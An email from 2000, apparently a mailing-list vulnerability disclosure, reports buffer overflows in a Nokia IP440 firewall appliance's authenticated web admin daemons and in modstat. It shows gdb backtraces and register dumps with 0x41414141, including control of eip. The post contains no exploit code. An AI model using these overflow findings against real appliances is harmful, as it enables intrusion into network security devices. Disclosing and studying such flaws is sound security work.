From - Mon Nov 27 02:33:27 2000
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Message-ID: <>
Date: Mon, 27 Nov 2000 02:33:27 -0800
From: K2 <>
X-Mailer: Mozilla 4.76 [en] (X11; U; SunOS 5.8 i86pc)
X-Accept-Language: en
MIME-Version: 1.0
Subject: Nokia firewalls
References: <>
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit

Well I just unwrapped my shiny new Nokia IP440 integrated
Firewall-1/IDS appliance and thought to give it a once over. It appears
to be a older fBSD kernel + some firewall (checkpoint 4.1) + some IDS
(ISS) + remote admin (SSH/http).

Now these vulnerabilities all require an authenticated user, however,
it's still amazing to me that a device with security as it's primary
function would have so many issues.

A request to it's default http administration site...

will result in "Html_gen exited because of signal: Segmentation fault"
After this, any attempt to connect to the site will return,
"Error while getting page: Couldn't connect to /tmp/xsets: No such file
or directory"

the /bin/xpand will die, dumping core in /var/tmp...
scrooge:/var/tmp# gdb -c xpand.core-11.27.2000-094458
GDB is free software and you are welcome to distribute copies of it
under certain conditions; type "show copying" to see the conditions.
Modified in 1997, 1998 by Nokia IP Inc.
There is absolutely no warranty for GDB; type "show warranty" for
GDB 4.13 (i386-unknown-freebsd), Copyright 1994 Free Software
Foundation, Inc.
Core was generated by `xpand'.
Program terminated with signal 11, Segmentation fault.
#0 0x10046fb6 in ??
(41414141, 1004455c, efbfd3b4, 1004f060, 7cb40, 33b18, 0, efbfd3d4)
(gdb) file xpand-11.27.2000-094458
Reading symbols from xpand-11.27.2000-094458...done.
(gdb) bt
#0 0x10046fb6 in end
(41414141, 1004455c, efbfd3b4, 1004f060, 7cb40, 33b18, 0, efbfd3d4)
#1 0xefbfd3b8 in end
(41414141, 1004455c, efbfd3b4, 1004f060, 7cb40, 33b18, 0, efbfd3d4)
#2 0x10047110 in end
(7d380, 41414141, 1004f060, 36158, 33b18, efbfd3f0, 100446df, 7cb40)
#3 0x10044233 in end
(7cb40, 41414141, 41414141, 0, 1004f060, efbfd408, 1004416c, 5fec0)
#4 0x100446df in end
(5fec0, 41414141, 41414141, 1004f060, efbfd42c, 1004732e, 3a020,
#5 0x1004416c in end
(3a020, efbfd444, 1004f060, 5fec0, 31680, 0, 56, efbfd44c)
#6 0x1004732e in end
(321a0, 10044144, efbfd444, 1004f060, 100446bc, 5fec0, efbfd46c,
#7 0x100441ac in end
(332a0, 100446bc, 5fec0, efbfd4b0, 7f0c0, 0, efbfd65c, 21983)
#8 0x10044713 in end (31680, 10013, 17a7, 66000, 0, 0, 0, 0)
#9 0x21983 in handle_template_request (d=0x34000,
request=0x66000 "USER admin\n", 'A' <repeats 189 times>...,
request_len=6055, fd=9, fd_af=1, 1004f060, 40f40, 654b0) at
#10 0x22d6a in stream_set (
fdi=0x654a0, 1004f060, 1, 654b0, 0, 6b64632f, 62696c00, 40) at
#11 0x10041491 in end (0, 1, 0, 38000, efbfda60, 23354, 1, 0)
#12 0x10046ec0 in end (1, 0, efbfda88, efbfda84, 0, 654a0, 29000, d)
---Type <return> to continue, or q <return> to quit---
#13 0x23354 in main (argc=1, argv=0xefbfda88, efbfda90, 0, 0, 29000, 0,
at xpand.c:385
(gdb) info reg
eax 0x41414141 1094795585
ecx 0x41414141 1094795585
edx 0x0 0
ebx 0x1004f060 268759136
esp 0xefbfd394 0xefbfd394
ebp 0xefbfd394 0xefbfd394
esi 0x7d380 512896
edi 0x41414141 1094795585
eip 0x10046fb6 0x10046fb6
ps 0x10206 66054
cs 0x1f 31
ss 0x27 39
ds 0xefbf0027 -272695257
es 0x80027 524327


scrooge:/var/tmp# gdb -c html_gen.core
(gdb) info reg
eax 0x88dc 35036
ecx 0xfffffffc -4
edx 0x4949 18761
ebx 0x1009b060 269070432
esp 0xefbfaa74 0xefbfaa74
ebp 0xefbfaa84 0xefbfaa84
esi 0x0 0
edi 0x41414141 1094795585
eip 0x10084d1b 0x10084d1b
ps 0x10216 66070
cs 0x1f 31
ss 0x27 39
ds 0x27 39
es 0x27 39


scrooge:/var/tmp# ./modstat -n
Type Id Off Loadaddr Size Info Rev Module Name
modstat: LMSTAT: Bad file descriptor
Segmentation fault (core dumped)
(gdb) info reg
eax 0x4 4
ecx 0xefbfcfb8 -272642120
edx 0xefbfcfb8 -272642120
ebx 0x0 0
esp 0xefbfd354 0xefbfd354
ebp 0x41414141 0x41414141
esi 0xffffffff -1
edi 0x3 3
eip 0x41414141 0x41414141

Anyhow, I just thought they may want to clean these things up...